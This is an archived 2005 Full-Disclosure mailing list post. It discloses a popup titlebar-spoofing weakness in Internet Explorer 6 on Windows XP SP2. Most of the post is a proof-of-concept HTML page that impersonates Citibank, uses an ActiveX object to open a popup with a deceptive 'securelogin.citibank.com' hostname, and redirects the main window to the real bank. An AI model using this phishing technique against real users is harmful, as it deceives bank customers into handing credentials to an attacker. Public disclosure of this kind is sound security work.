[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] WindowsXPSP2 script-initiated popup window titlebar spoofing

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] WindowsXPSP2 script-initiated popup window titlebar spoofing
From: "bitlance winter" <bitlance_3@xxxxxxxxxxx>
Date: Mon, 21 Feb 2005 03:47:53 +0000

Hi LIST.

Windows XP SP2 forces the titlebar to be present in script-initiated Internet Explorer windows. In the titlebar, domain name is listed before the page title.

Using magic DNS,this domain name can be exploited by malicious people to trick users into visiting a malicious popup window. The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
[!-- saved from url=(0014)about:internet -->
[html lang="x-klingon">
[head>
[title>Welcome to Citibank[/title>
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[meta http-equiv="Content-Script-Type" content="text/javascript">

[script type="text/javascript">
[!-- Begin
function shellscript()
{
 window.focus();
 pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
 sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
 sP += 'menubar=0,resizable=0,width=315,';
 sP += 'height=200,left = 250,top = 200'
 day = new Date();
 id = day.getTime();
 eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}

function main()
{
 targetURL = 'http://citibank.com/us/index.htm';
 x.DOM.Script.execScript(shellscript.toString());
 x.DOM.Script.setTimeout("shellscript()");
 location.replace(targetURL);
}

setTimeout(' main() ',1000);

// End -->
[/script>

[/head>

[object
        id="x"
        classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
        width="1"
        height="1"
        align="middle"

[param name="ActivateApplets" value="1">
[param name="ActivateActiveXControls" value="1">
[/object>

[/body>
[/html>

- -----8<----- -----8<----- -----8<----- -----8<-----

Reference:
http-equiv      (HOW TO BREAK XP SP2 POPUP BLOCKER)
 http://www.securityfocus.com/archive/1/384037

REGARDS.

--
bitlance winter

_________________________________________________________________ On the road to retirement? Check out MSN Life Events for advice on how to get there! http://lifeevents.msn.com/category.aspx?cid=Retirement

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] proxy honeynet
Next by Date: Re: [Full-Disclosure] proxy honeynet
Previous by thread: Re: [Full-Disclosure] proxy honeynet
Next by thread: [Full-Disclosure] paNews v2.0b4 - PHP Injection
Index(es):
- Date
- Thread